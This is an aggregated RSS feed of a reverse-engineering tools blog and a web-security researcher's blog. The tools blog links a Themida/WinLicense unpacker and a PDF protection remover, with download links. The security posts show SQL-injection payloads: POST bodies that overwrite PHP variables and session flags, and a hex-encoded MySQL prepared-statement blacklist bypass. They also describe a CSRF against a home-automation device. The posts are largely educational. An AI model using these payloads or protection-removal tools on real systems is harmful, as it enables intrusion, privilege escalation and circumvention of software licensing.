http://reversengineering.wordpress.com/feed/ Functions: 1) Deobfuscate Select instructions in disasm window and execute this command. It will try to clear the code from junk instructions. Example: Original: 00874372 57 PUSH EDI 00874373 BF 352AAF6A MOV EDI,6AAF2A35 00874378 81E7 0D152A41 AND EDI,412A150D 0087437E 81F7 01002A40 XOR EDI,402A0001 00874384 01FB ADD EBX,EDI 00874386 5F POP EDI Deobfuscated: 00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a seperate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> PHP, variable variables, oh my!

http://rgaucher.info/feed/rss2 I was just looking at some PHP code for one of our clients, and found a case I haven't seen many times before. I thought I should share it here. The code I was looking at looks like this: <?php // Init the PHP array with some SQL code to start the query $declareSQLArray = InitializedArray('stuff'); // Use a strong enough validation routine for do the input // validation of POST variables while(list($name, $value) = each($_POST)) { if(!is_array($value)) $$name = StrongValidation($value); else $$name = $value; } // Do something with my variables and always do a proper // validation when I use the data // Eventually, build my SQL command, and send this to the DB $sql_command = join(' ', $declareSQLArray); mysql_query($sql_command); ?> The code, even if horribly constructed, does not seem to show important weaknesses, but the usual case of submitting a POST variable as an array, and bypassing the StrongValidation. Then, in that case, it would have failed every other validation routines in the code. Even if experienced with PHP, you might not have encountered variable variables before. In short, this allows to dynamically declare named variables. Here is a simple example: hubert:~ Romain$ php -r '$name="foo"; $$name="Hello World!\n"; echo $foo;' Hello World! Here, the variable $foo gets declared, and assigned using PHP's variable variables capabilities. Getting back to our code example, I'm sure the reader will spot the issue, and what an attacker can do to exploit such scenario to trigger, in that case, a SQL injection. Since the variable $declareSQLArray is defined and initialized before the POST variables lookup, it is possible to reassign it using the variable variables. In that case, no validation is performed when we submit an array, and this is exactly what we want to do! To exploit the SQL injection, you only need to submit POST variables to overwrite the $declareSQLArray, and add the content that we want in it! POST /code_example.php HTTP/1.1 Host: example.com ... declareSQLArray%5B%5D=SELECT...;&declareSQLArray%5B%5D=--&whatever... Job done! The resulting SQL query will start with the payload that was submitted as part of $declareSQLArray. You've got your SQL injection. Update: While driving back home, I was wondering if I could overwrite values from the SESSION using this technique. A couple of lines of code, and POST request after the answer is short: YES. Imagine that you have an isadmin variable as part of the session (which is an associative array). This variable would be set in a code like this: if ($user->isNotAdmin()) $_SESSION['isadmin'] = 0; else $_SESSION['isadmin'] = 1; Exploiting the previous weakness of the code example, we are able to overwrite the $_SESSION['isadmin'] content, only by supplying what will be interpreted as an associative array by PHP: POST /code_example.php HTTP/1.1 Host: example.com ... _SESSION%5Bisadmin%5D=1&whatever... I'm sure you're thinking, as I do, that this is getting more interesting! Anyways, this issue is not new at all, it is known as Dynamic Variable Evaluation (thanks to Steve Christey). The interesting part of it is that DAST won't be able to detect it (or maybe if you are lucky enough), and it is very hard for a SAST to deal with it (actually, I doubt any SAST vendor who supports PHP handles this case, but it's not impossible since they have all they need to solve the problem). Update 2: Based on the comments, I did some testing and observed that even if we can overwrite data from the session, this data does not get persisted in the session. This means that you can still control a value from a super global for the remaining execution of the script, but cannot persist the data.

==> Dissection of a SQL injection challenge

http://rgaucher.info/feed/rss2 As part of the SQL injection challenges that I developed (focusing on MySQL), one of the classic challenges (we have the same types for XSS), is a simple, yet disturbing for juniors, black-list and few controls such as partial output encoding. In the case of SQLi, I decided to blacklist the following keywords (as seen during an assessment): select, union, drop, delete, insert, and, or, where, update, if, not On top of this, I use the mysqli function that properly escapes strings (mysqli_real_escape_string), and I remove all white-spaces. The SQL commands is using a multiple queries aware driver (i.e., you can stack queries), and the injection context is fairly simple and we have something like this: SELECT username FROM users WHERE userid=<<HERE>> Since this is an * exploitation* challenge, the goal is to extract the password of a given user from this database. Now, every time that I write a challenge, I first come up with the application and I need to break it after to make sure that there is a solution (unless the challenge is derived from what I found already in some of my previous assessments). Anyway, here my main personal challenge was to come up with a query that would retrieve the proper data without using one of the black-listed keywords. Spaces and quotes are easy not to care about simply by using /**/ as a word separator, and we can use the hexadecimal representation of strings so that we make sure not to use single-quotes & co. Here is a quick summary with 2 similar queries: * Spaces bypass: select//foobar//FROM//table//WHERE/**/user='c3'; * Single quotes: select foobar FROM table WHERE user=0x6333; The way I found to solve this challenge is to use MySQL prepared statements. However, I was fairly disturbed at first since I cannot use the following syntax in MySQL: PREPARE st FROM 0x73656c656374202a2066726f6d207573657273; EXECUTE st; DEALLOCATE PREPARE st; where 0x73656c656374202a2066726f6d207573657273 contains the query to get everything from the users' table (i.e., select * from users). The syntax of the PREPARE keyword is not flexible like any other string manipulation in MySQL, and does not allow strings with their hexadecimal representation. The gotcha here (I wouldn't call this a trick) is to use a temporary variable assignment, and use this variable in the PREPARE construct. The final construct I used is the following: SET @v=0x73656c656374202a2066726f6d207573657273; PREPARE st FROM @v; EXECUTE st; DEALLOCATE PREPARE st; Now, putting the pieces together, and adding this into the our original query, we get a payload similar like this: 9999||username=0xdeadbeef;SET//@s=0x73656c656374202a2066726f6d207573657273;PREPARE//ss//FROM//@s;EXECUTE//ss;DEALLOCATE//PREPARE/**/ss;# This construct is very similar to the solution of the challenge, but not exactly the same since we need to use the application to display the data. Therefore, in that case we need to make sure that the prepared statement will return only one column, etc. Anyway, I wanted to share this since I haven't come across many references that talked about using prepared statements as SQL injection payloads...

==> WASC Threat Classification 2 - Wordle

http://rgaucher.info/feed/rss2 I just dig that image out; I made it for the release of the WASC Threat Classification 2.0

==> Yes, we need a standard to evaluate SAST, but it ain't easy...

http://rgaucher.info/feed/rss2 In reply to Dinis's blog post: The Need for Standards to evaluate Static Analysis Tools 1. You unfortunately list few types of SAST. Many of tools don't implement taint analysis -- if you go in the Ada/C/C++ world, you won't see much of taint based analysis, but other technologies such as symbolic execution (Grammatech), abstract interpretation (ASTREE, PolySpace, etc.), and more. A list of SAST can be found on the NIST SAMATE website: List of Source Code Security Analyzers 2. As said on twitter, concerning the WASSEC, I don't believe it's important to have public evaluation of commercial/open-source tools. Also, WASSEC lists some vulnerabilities that the tool should look for, we don't provide test cases so it's not nearly possible to claim that a tool effectively test for a given problem, e.g. difference between two tools: * Only test XSS with few payloads and does regexp matching of the rendered html * A smarter engine that automagically crafts attacks and look at the resulting html with a JS engine (or so, that leads to fewer FP). Depending on who you are and what you want, you might very well say that those two tools have the same support for XSS... Moreover, tools are changing so quickly that an evaluation would only be accurate at the time you make it. 3. NIST SATE is literally an exposition. NIST choose test cases (real open-source program that covers different type of functionalities and technologies) and ask tool makers to run their SAST on those programs. The goal isn't to compare the tool to claim that one is better than the other for a type of techno, but it's too see how tools (in general) performs, to see how many types of weaknesses the tools find and also what is the overlap of tool findings (which resulted in a very little amount of findings). More generally, as Andrew said, a SAST isn't only an analysis engine that finds weaknesses in a program; it's a suite of functionalities: * support technologies * allows users to develop custom checks (or custom rules) * displays the weaknesses to the user (allow to rank/prune and explain problem) and reporting capabilities Ultimately, every one of those elements are important and need to be tested, but again, the importance of those depend on who you are and how you want to use the SAST (from simple compliance type of scan to exhaustive security testing). Just to tell you, NIST SAMATE (organizers of SATE) have been thinking a lot of those problem and there is no easy solution for evaluating SAST... But the last SATE report explains some of the problems we (I was part of the SAMATE team at the time) faced: SATE 2008 - NIST Special Publication 500-279

==> Data driven factory: I give you data, you give me an object...

http://rgaucher.info/feed/rss2 I've been working on a data warehouse project lately, in python, to support different kind of data analysis I am developing as part of my current work. I decided to use SQLAlchemy as the ORM; I can then quickly move from my development version using SQLite database, to production, using MySQL or MSSQL databases. SQLAlchemy is also one of these amazing ORM that support sharding -- It's not necessary to tell that it's very important when you develop a tool that will import, format, process and analyze gigabytes of data. Also, working with a lot of data types, to register them into my ORM instance, and to persist them into a database, I need my software to be able to quickly generate an object representing the data type: a particular instance of the object. Developers usually create factories in order to create instances of objects. The main idea is to delegate the instantiation of the object to a third party object. In most factories, we specify a type of object that we want to create: Give me an instance of a pizza with mushroom, tomatoes and ham. The last point on asking for a particular type (or sub-type) of object was the main limitation for my use. In fact, most of my types are related in some ways, but without strong inheritance (Dish > Pie > Pizza); another important point is the maintainability of a code where I would list all different types of object my factory needs to create... Well, I wanted something more generic: a data driven factory. The data driven factory is a factory that, based on the data sent to the factory object constructor, will produce an instance. A simple example would be to be able to get an instance of a Margerita pizza when giving the certain ingredients (tomatoes, mozzarella and parmesan) or a Neapolitan if I add enchovies. This type of factory, which depends only on the data to give in parameter, is possible in python by using the class inspection capabilities of the language. In fact, the implementation I propose requires to register each class to be constructed in the factory, constructor arguments (and defaults arguments) will be analyzed for a matcher later on, and to give as arguments the "type" of each data field (basically, the arguments); the factory will then get the appropriate object for you. Side note: The fact that the factory doesn't return an instance of an object is for performances. In fact, I get the class from the factory, store it and loop through the instantiation with millions of data... Example of use: class Shape(object): pass class Circle(Shape): def init(self, center, radius=RAD_MAX): .... class DiskHole(Shape): def init(self, center, radius, small_radius=RAD_SMALL): .... factory = DDFactory() factory.register(Shape) factory.register(Circle) factory.register(DiskHole) print factory.get(['center', 'radius']) #> return 'Circle' ctor print factory.get(['center', 'radius', 'small_radius']) #> return 'DiskHole' ctor You can access this factory here: dd_factory.py In the distributed code, I assume that each object to create has a tablename class member that tells which database table is the eventual target (which is my case using SQLAlchemy / declarative objects). This is easy to change by replacing the factory register method by something like this: def register(self, cls): if hasattr(cls, 'init'): s_cls = str(cls) args, defaults_dict = DDFactory.defaults_values(cls) if s_cls not in self.registrar: self.registrar[s_cls] = {'class' : cls, 'args' : args, 'defaults' : defaults_dict}

==> NIST Static Analysis Tool Exposition special publication released

http://rgaucher.info/feed/rss2 "The NIST SAMATE project conducted the first Static Analysis Tool Exposition (SATE) in 2008 to advance research in static analysis tools that find security defects in source code. The main goals of SATE were to enable empirical research based on large test sets and to encourage improvement and speed adoption of tools. The exposition was planned to be an annual event." SATE 2008 was one of my last project at NIST. I really enjoyed working on this project from the beginning, it was challenging especially because we had to create so many artifacts to make the tool reporting the weaknesses the same way, integrate them all together and provide ways for assessors to make meaningful reviews. In a nutshell, we selected 6 different open-source programs (3 en C, 3 in Java) and made tool vendors running their tool on these test cases. Tool vendors were allowed to customize their tool if their tool provide such capability. Fortify was the only vendor who created a custom rule (to help the tool with a validation routine for MVNForum). Our goal was then to combine the results all together and analyze: provide information on the correctness of the tool. If you are interested, you can download the SATE data and the NIST SATE Special Publication. Thanks to all the SAMATE team for this effort, and especially Vadim Okun and Paul E. Black. For more information, you can reach the SATE page at NIST.

==> HTML 5 current browsers implementation support

http://rgaucher.info/feed/rss2 Firefox 3.1beta has been released today, with the support of two HTML 5: audio and video. Gareth and I exchanged some messages on twitter+ about the current support of HTML 5 by the different engines. The first document I found (well, asking on the #whatwg IRC chan) is the Comparison of layout engines you can find on Wikipedia; they also pointed me to a wiki that WhatWG maintains: Implementations in Web browsers. These are pretty incomplete documents and decided then, to create a mapping of the current WhatWG document and and the support of the browsers. This is possible because in the current document, they report the implementation status of the different items. Anyway, here is a table, I assembled, containing the last information about the HTML5 implementations in the current browser engines. I also want to say that even if the WASC Script Mapping project has looked quite inactive for some time now, I will definitely continue it. I'm actually waiting to finish a couple of other projects I participate to, especially the WASC Threat Classification 2 and the Web Application Security Scanner Evaluation Criteria. I expect to get started again to Script Mapping during this summer... EDIT: I will maintain the current list of HTML5 implementation in current browsers: HTML5. March 30. + twitter is quite cool to follow/interact, feel free to follow me at @rgaucher

==> SHA-3 reference implementations buffer overflows

http://rgaucher.info/feed/rss2 Fortify just posted a nice blog post about the audit they did on several reference implementation that compete for being the next NIST SHA-3. They do not release much information on their findings: only one is described. I would have really like to see how powerful was the analysis (if it was) to find these problems. It could be nice too to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc. to do the same, and then, start another competition ;) I'd really like to emphasize the conclusions in the Fortify's blog post: Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two seperate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used. The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation.

==> When CAPTCHA fails...

http://rgaucher.info/feed/rss2 Some time ago, I was amazed by the difficulty of a CAPTCHA implemented by rapidshare. Well, today I came across one which is even worse. We all know that using a CAPTCHA is very bad on a usability point of view, but without them, spammers would easily add junk in your database. But it's even worse when the CAPTCHA software is not working properly... Sure you won't get any spammers here... nor regular users. Just to avoid confusion or misinterpretation, even if you refresh/clear cache/etc. you will get this message. And no, 'ERROR' is not the solution of the CAPTCHA. Hope that phishtank will fix that soon... We see many different CAPTCHA on the web, some are good, some not. I do not know why people keep developing their own simplistic CAPTCHA when there is a good services line the one provided by reCAPTCHA. This CAPTCHA is pretty solid and also adds audio version (way better for accessibility).

==> CIA spamming security groups: Be a part of a mission that’s larger than all of us.

http://rgaucher.info/feed/rss2 Hello Romain, The Central Intelligence Agency would like you to consider a career with the National Clandestine Service. The CIAs National Clandestine Service seeks qualified applicants to serve our countrys mission abroad. Our careers offer rewarding, fast-paced, and high impact challenges in intelligence collection on issues of critical importance to US national security. Applicants should possess a high degree of personal integrity, strong interpersonal skills, and good written and oral communication skills. We welcome applicants from various academic and professional backgrounds. Do you want to make a difference for your country? Are you ready for a challenge? All applicants for National Clandestine Service positions must successfully undergo several personal interviews, medical and psychological exams, aptitude testing, a polygraph interview, and a background investigation. Following entry on duty, candidates will undergo extensive training. US citizenship required. An equal opportunity employer and a drug-free work force. For more information and to apply, visit: www.cia.gov You can make a world of difference. Com'on guys, I'm not even US citizen... So yeah, CIA is looking for security guys by spamming on linkedin groups. Anything wrong in that process?

==> SSL Fails! SSLFail.com

http://rgaucher.info/feed/rss2 Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (wall of shame of SSL certificates?) So now, Google & co, fix your certificates :P

==> Every-day's CSRF: Sorry, I turned off your christmas tree lights

http://rgaucher.info/feed/rss2 Today, a friend of mine was really proud to show me the Home Automation installation he just bought. Well, since he lives in France and I am in DC, he showed me the web interface that was able to control the lights etc. in his house. As he wanted to test this domotic system, he only plugged his Christmas tree lights on the system. Well, maybe I'm only seeing bad stuff around me, but... Dformation professionnelle we'll say! It was so easy to make it blinking with a simple script that I showed it to him. So well, every 5 seconds, it would change the state. Anyway, this CSRF is not a big deal for him since it's only the Christmas tree lights, it's only a temporary installation and well, it's fun. But after a simple google search, I found another site like my friend's. The URL that Google return is: http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON Which is basically turning on some device... :) Also, not only this application has tons of CSRF, but also a nice stored XSS which let you do whatever you want with it! And btw, since the Google Robot reported this, it means that every time that it crawls the website (or at least, reaches that particular URL), it will set the device ON :) Web security enters your house, f34rs!

==> IE7, no Same Origin Policy when the script/file is on your file system

http://rgaucher.info/feed/rss2 It's been such a long time since I haven't posted here. I've been quite busy with the new job at Cigital and all the implication. Anyway, this morning, a collegue of mine show me a piece of javascript he used for create a request to another website (actually, this was just to do a javascript what I did in Python previously). This totally bugged me. He has been able to craft a request (using XHR) from a local file to a distant website... WTF with SOP? After some tests, it seems it's only working with IE7, but well, I didn't test with many browser, only with Firefox 3, Chrome, IE7. So, I have no idea if this is known for a long time or not, but well, I haven't seen this before. A simple POC is available here: xhr_SOP_ie7.html

==> Internet User Privacy Values Survey

http://rgaucher.info/feed/rss2 I know how tough and crucial it is to get participants to a survey, so that would be great if you guys could take this and spread it a little bit more... Researchers at ThePrivacyPlace.Org are conducting an online survey about privacy policies and user values. The survey is supported by an NSF ITR grant (National Science Foundation Information Technology Research) and was first offered in 2002. We are offering the survey again in 2008 to reveal how user values have changed over the intervening years. The survey results will help organizations ensure their website privacy practices are aligned with current consumer values. The URL is: http://theprivacyplace.org/currentsurvey We need to attract several thousand respondents, and would be most appreciative if you would consider helping us get the word out about the survey, which takes about 5 to 10 minutes to complete. The results will be made available via our project website (http://www.theprivacyplace.org/). Prizes include $100 Amazon.com gift certificates sponsored by Intel Co. and gifts from IBM and Blue Cross and Blue Shield of North Carolina On behalf of the research staff at ThePrivacyPlace.Org, thank you!

==> Last week at NIST

http://rgaucher.info/feed/rss2 Every good things have an end... this is the time for me to leave NIST. So I will be a security consultant at Cigital, Inc.. I've been working at NIST for 2 years and a half as a Guest Researcher in the SAMATE Project. I originally came at NIST to do mostly statistical analysis or so, but it changed a lot! I started by building the SAMATE Reference Dataset website and this is how I started to learn about "security", but working with flawed source code. This was very obscure to me (I guess like everybody computer scientist specialized in applied mathematics) and I learned a lot about weaknesses, vulnerabilities, "how to find them?", scanners etc. My first real security related work was about the Web Application Security Scanner Specification and then, design a way of testing the web apps scanners: * test suite with seeded vulnerabilities * checking the types of attacks * trying to explain the false-negative of the tools by a monitoring of what/where the scanner went in the application at a logical level, such as "did the tool logged in successfully? did it generate a couple of errors, did it try many times? The goal of the 3 components based analysis is to really be able to understand what the tool is doing, if it didn't find a particular vulnerability, why? One of the best moments I had at NIST was when we did the Static Analysis Tool Exposition. I was part of the organizers and from the beginning, it was a real challenge: choosing good test cases, criteria to evaluate the reports, etc. Of course, SATE 2008 was not perfect, we did many mistakes, but at least, we tried, we had some results and we learned a lot. I have good hopes for the next SATE, even though this is really challenging on many aspects: 1. Not make people think/act like this is a competition (we sometimes see people claiming they won SATE 2008, but... well, there would be many things to say to them) 2. Having a strong evaluation criteria (I guess this is challenging every time human assessment is part of the game) 3. Solve the way to present data to the evaluators. We couldn't have the GUI of the tools etc. so our analysis (as an evaluator) was really limited and we sometimes had to guess what was the exact weakness report 4. and finally, having more resources and help for evaluating the weaknesses reported by the tools (47k this year, one month to evaluate...) Oh well, I will of course continue to follow what the SAMATE team is doing, even though I will be away and busy with other interesting stuff and I'm really looking forward to see the results of the current study we are running on the function-wise weakness characterization. But for now, it's time for me to get some vacation, going back to France for almost one month, getting my worker visa etc.

==> Scalp 0.4: apache log based attack analyzer, updated

http://rgaucher.info/feed/rss2 Some time ago, I released a first version of a tool named Scalp. The tool analyzed the Apache HTTPD logs in order to examine if there were attacks or not. The attack detection is based on the rules provided by the PHP-IDS project. Today, I took time to finalize a bit more the Python version of Scalp. The version 0.4 can now be downloaded on the project web page. This version includes a couple of features such as: * Output in HTML, XML or TEXT format * Specify the output directory * Using a random sample for scanning the log file * Trying to decode the potential attack vectors * Returning the lines that couldn't be examined And then, with some other options that already existed in the previous versions, * Select a time frame * Select classes of potential attacks the tool seems to approach a final version. I won't add more into it since I want to keep it simple and quite fast (I may add optimization if I find some). Also, the C++ version is on its way and mostly done with same amount of options, the code is checkable using the google repository, but I still have to work on options and time-frame specification. Scalp 0.4: * HTML report example * Download the python script

==> PyQt and WebKit integration: unexpected limitation [fixed]

http://rgaucher.info/feed/rss2 For the one that don't know Qt, this is a huge and mature framework for developing GUI & more on different platform (to read, multi-platform). I already did some development using Qt and C++ (especially when I was working at the GERAD). As, with Marcin, we wanted to have a look at some technologies that involved a browser etc. I decided to look at Qt and the almost-fresh WebKit integration. The integration of WebKit in a framework like Qt, allows the developer to embed supposedly in a easy manner a browser that supports the basic web technologies which are HTML, CSS and JavaScript (it seems that Flash is going to be supported soon, and anyway, one can write its own plugin in order to interact with some specific content) in its application. And indeed it is easy... I used PyQt in order to develop a very simple prototype and see what we are able to do with this new technology. As I know already Python and Qt, it was easy to me to start and be kinda effective. So, in few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, view the source and a simple encoding converter (click on the image to see the full screen-shot): At this point, I was actually very excited, less than 500 lines of Python in order to create that... was kinda worth few days of work in order to create a useful tool: the Swiss Army Knife of the Pen-Test. My next and logic step was to extend the current tool in order to have the tamper-data like capabilities (eg. being able to hijack the HTTP request and then tampering the GET/POST data). And here come the problems... it's apparently not possible to get the current request then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET request since this object is use to set the proxies etc. but nothing... I think they just didn't open this possibility for some reason. Oh well, I then stop developing this prototype and will try to contact Qt experts/developers just to figure out if there is no other way to do it. I thought of a solution which would be to have my own HTTP manager using QHttp in order to do the request, get the response etc. and then sending the content to the browser; this would be great in a webapps scanner, but for the use that I wanted with, that would create huge limitation for the user-interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt open their network management under the QWebView widget... Fixed: An update to let you know that I actually fixed the problem, it was really stupid from me, but I should really care when the method are virtual or not before overloading it or not :/ shame on me! So now, I am able to have a firefox/tamper-data/firebug in one tool :)

==> And so you wanted to protect your email address on your website...

http://rgaucher.info/feed/rss2 People start thinking of how to prevent spam when they're building website, that's a fact and that's very good indeed. The only problem is when they don't actually know how a bot would handle the HTML page... For instance, I was surfing on qik.com and saw this little piece of JavaScript in order to protect the exposure of the email address: <script type="text/javascript"> //<![CDATA[ document.write('<a href="mailto:XXXX@qik.com"\ title="Send us an email!">XXXX@qik.com<\/a>'); //]]> </script> As the readers of this blog may know, the bot process is really easy.... download the HTML page (crawling) and then trying to extract the email address (parsing). This is just obvious that a bot wouldn't bother with the CDATA tag or because this is embedded in a JavaScript code, if I would have to do a bot, nonetheless I would have a very lossy parsing in order to gather as much information as possible, but I wouldn't care about "in which context am I?". Also, according to some testing I'm doing, I can tell you have if this was a URL, the Google bots would get them... So please, obfuscate just a bit this... some example can be found on fuckthespam.com

==> Why the "line of code" is indeed a good metric

http://rgaucher.info/feed/rss2 When I first learned about source code metrics, I was amazed about people using the line of code for doing comparison with software. It was for me a lack of imagination. At the beginning of the week, I started a small and fast experiment: extracting metrics from the SATE 2008 test cases. This experiment focuses on function-wise properties and therefore, I have to extract for each functions a couple of metrics: * McCabe's cyclomatic complexity which computes the code complexity, this is indeed a good metric to estimate the difficulty that a human will have to understand a given piece of code (very important for security related problems) * Line of Code * Line of Comments * Number of local variables * Number of parameters (which represents the coercion between the function and the whole program) * Number of function call * Number of function that are ``sources'' * Number of function that are ``sinks'' * Number of C standards functions (obviously, only for C test cases) At first the the line of code was implemented cause it's an easy one to compute and it also gives an important value if we want to normalize the other metrics. We also decided to introduce the number of ``source/sinks'' for studying input validation weaknesses later on... Anyway, after running some statistics on the output results, I was amazed by observing that the Pearson correlation coefficient between McCabe and Line of Code was never less than 0.90 (which could be compare to 90% as a correlation rate) (but I have to say that there is huge limitations in the parsers we are using for extracting information, for instance, the C is not pre-processed etc.). This result is only valid for C test cases, actually, the average of observed correlation in Java test case is around 0.60... Of course further statistical analysis will be necessary to conclude anything on this subject, but if we were unlucky with the test cases selection, this may have been a source of the problem, but I don't think we were. Actually, this seems quite logical to think that these metrics a related, the longer the code is, the more complex in term of tests, loops etc. it can be, there is indeed more chance that a longer code contains more cycles :) Oh well, I'll keep writing about especially since I expect to get results pretty soon...

==> Trie based fast and massive replacement (Algorithm)

http://rgaucher.info/feed/rss2 While working on the C++ version of scalp, I had to do massive simple transformations of a given text, ie. replacements of words by others. Since the main way to do this (a loop which does a replacement at the time), is very inefficient, I decided to find something faster. I then came up with a tree based replacement algorithm; I believe this is kinda famous but I never heard about such algorithm, it basically uses a non compact trie in order to have an efficient search of the current word. The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to to replace the words: "ba", "me", "mp" in a text, the trie will be this following one: The idea is then to iterate over all the characters in the text, and for each letter determines whether this is a possible word to replace or not (simply by looking if the letter is a bleep of the trie root). Then, we iterate over the next letters in the text in order to see if the sequence of letters are an actual word to replace or not (every time, the same methodology is used: look in the bleep at the current state of our iterator in the trie). This algorithm seems more efficient than the simple replace used in a loop since we will perform a descent in a tree and therefore replace a linear search by a logarithm one. I ran a little statistical comparison between two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes varying and I aggregated the results from the same dictionary size. So, for a given size of a dictionary (let's say, 200 words to replace), a text has been generated with a density that vary from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace) and finally, the size of the text vary from 25 to 200 words (and words are randomly generated to be from a size 5 to 32). As I said previously, the results from a same dictionary size has been aggregated since I've seen practically that the result mainly depends on the dictionnary size (it also obviously depends on the size of the text, but as this is a constant for the 2 algorithm, I can compute the mean of the different data to extract the average gain for a particular dictionary size). Finally, here is the curve that shows the logarithm progress of the gain compared to the classical method): The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation): void str_replace(string& where, const string& what, const string& by) { for (string::size_type i = where.find(what); i != string::npos; i = where.find(what, i + by.size())) where.replace(i, what.size(), by); } and has been used M times (M is the size of the dictionary). I also decided to release a very-early version of this replace algorithm (which is not template yet): stree.h which use the great STL friendly tree structure from Kasper Peeters. As for data information, the here is the code I used to generate the

==> A morning at work: Content-Disposition blocked!

http://rgaucher.info/feed/rss2 A morning, I woke up, and all the websites using a download system didn't work anymore. Yeah this is what I've seen. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore. Such a big stress thinking that everything is broken at first, then after some time, realized that the problem is about the Content-Disposition header field which is dropped. I wouldn't say that I would like to thank the admin that do no tell people about the modification... Anyway, I guess this is every time like that? The Content-Disposition HTTP header field is used to explain to the browser how the data are presented. I basically use it in order to force a download system using such php script: <?php // download.php // some checks on the $fname, variable to be sure // it exists and is in the allowed directories... header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, pre-check=0"); header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($fname)); header("Content-Disposition: attachment; filename=".basename($fname)); header("Content-Description: File Transfer"); @readfile($fname); exit; ?> Now, if you cannot submit the Content-Disposition field, then the browser will download the file called "download.php". A quite simple solution, is to fool the browser by making the name of the reachable URI the same as the file it should download, using Mod_Rewrite. RewriteEngine On RewriteBase /mydir RewriteRule ^download/([^/]+)$ /mydir/download.php?file_redir=$1 And just a simple modification in the original script in order to detect the "file" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to make the redirection automatically. <?php // download.php // some checks on the $fname, variable to be sure // it exists and is in the allowed directories... if (isset($_GET['file_redir'])) { $fname = $_GET['file_redir']; // checks for good files (careful of directory traversal etc.) header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, pre-check=0"); header("Content-Type: application/octet-stream"); header("Content-Length: " . filesize($fname)); header("Content-Description: File Transfer"); @readfile($fname); exit; } else { header("Location: /mydir/download/$fname"); exit; } ?> Then you don't have to change all your pages. This is of course a (not so?) temporary solution since the server will do extra work in order to go to the same state, the download of the file, but well, it does the job to fool the browser...

==> Scalp: apache log based attack analyzer

http://rgaucher.info/feed/rss2 I started a project some time ago in order to parse some apache log file, to detect some attacks etc. The attack recognition is based on the PHP-IDS filters. The first release version is written in Python http://code.google.com/p/apache-scalp/downloads/list but I started (well, almost finished) a faster multi-threaded/C++ version in order to be able to handle bigger log files. The main project page is reachable here: http://code.google.com/p/apache-scalp Scalp the apache log! - http://code.google.com/p/apache-scalp usage: ./scalp.py --log|-l --filters|-f --period [OPTIONS] --attack --log |-l: the apache log file './access_log' by default --filters |-f: the filter file './default_filter.xml' by default --exhaustive|-e: will report all type of attacks detected and not stop at the first found --period |-p: the period must be specified in the same format as in the Apache logs using * as wild-card ex: 04/Apr/2008:15:45;*/Mai/2008 if not specified at the end, the max or min are taken --html |-h: generate an HTML output --xml |-x: generate an XML output --text |-t: generate a simple text output (default) --except |-c: generate a file that contains the non examined logs due to the main regular expression; ill-formed Apache log etc. --attack |-a: specify the list of attacks to look for list: xss, sqli, csrf, dos, dt, spam, id, ref, lfi the list of attacks should not contains spaces and be comma separated ex: xss,sqli,lfi,ref

==> My talk at SAW: Automated Evaluation of source code analyzer output

